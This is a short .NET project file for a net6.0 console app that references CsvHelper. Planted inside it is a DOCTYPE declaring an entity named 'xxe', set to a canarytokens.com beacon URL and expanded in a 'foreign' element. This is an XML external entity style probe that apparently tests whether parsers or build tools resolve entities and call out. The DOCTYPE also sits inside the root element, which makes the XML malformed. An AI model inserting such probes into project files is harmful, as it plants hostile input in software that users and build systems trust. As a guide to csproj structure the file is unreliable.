<?xml version="1.0" ?>
<Project Sdk="Microsoft.NET.Sdk">
    <!DOCTYPE test [ <!ENTITY xxe "http://22w5f67ylt854tzanwflpwz6z.canarytokens.com"> ]>
    <foreign>
        &xxe;
    </foreign>
    <PropertyGroup>
        <OutputType>Exe</OutputType>
        <TargetFramework>net6.0</TargetFramework>
        <ImplicitUsings>enable</ImplicitUsings>
        <Nullable>enable</Nullable>
    </PropertyGroup>

    <ItemGroup>
      <PackageReference Include="CsvHelper" Version="30.0.0" />
    </ItemGroup>

</Project>
